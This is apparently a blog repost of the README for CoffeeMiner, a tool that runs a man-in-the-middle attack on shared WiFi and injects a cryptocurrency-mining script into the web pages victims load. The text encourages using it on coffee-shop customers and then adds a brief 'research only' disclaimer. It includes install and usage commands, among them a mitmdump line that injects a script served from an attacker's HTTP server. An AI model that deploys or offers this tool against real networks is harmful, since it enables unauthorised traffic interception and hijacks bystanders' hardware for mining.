CoffeMiner – MITM WiFi To Inject Miner Script

CoffeMiner Logo MITM WiFi To Inject Miner Script

CoffeMiner is a tool to mining cryptocurrency using victim device, this tool is perform Man in The Middle attack and inject miner script in html page request by victim, the script will be automate mining a cryptocurrency.

Many Coffe shop that provide WiFi for customer, with this tool you can get free cryptocurrency coin from victim device that we have entered the script to mine. This tool use victim hardware (CPU/GPU) to mine a cryptocurrency coin. But all it just for research and education. Because you have to remember “Learn the hacker way’s to protect your self” don’t harming other’s.

CoffeeMiner

Collaborative (mitm) cryptocurrency mining pool in wifi networks

Warning: this project is for academic/research purposes only.

A blog post about this project can be read here: http://arnaucode.com/blog/coffeeminer-hacking-wifi-cryptocurrency-miner.html

Concept

  • Performs a MITM attack to all selected victims
  • Injects a js script in all the HTML pages requested by the victims
  • The js script injected contains a cryptocurrency miner
  • All the devices victims connected to the Lan network, will be mining for the CoffeeMiner

The Scenario

The scenario will be some machines connected to the WiFi network, and the CoffeeMiner attacker intercepting the traffic between the users and the router.

CoffeMiner Scenario 2 MITM WiFi To Inject Miner Script

Use

  • install.sh
§ chmod +x install.sh
§ ./install.sh

  • edit victims.txt with one IP per line
  • edit coffeeMiner.py, line 28, with the coffeeMiner httpserver IP :
os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T")

  • execute coffeeMiner.py
§ python3 coffeeMiner.py ipgateway

CoffeMiner Scenario MITM WiFi To Inject Miner Script

A complete instructions for academic scenario can be found in https://github.com/arnaucode/coffeeMiner/blob/master/virtualbox_scenario_instructions.md

Demo

CoffeMiner Demo MITM WiFi To Inject Miner Script xploitlab

You May Also Like

Leave a Reply

Your email address will not be published. Required fields are marked *

seventeen − sixteen =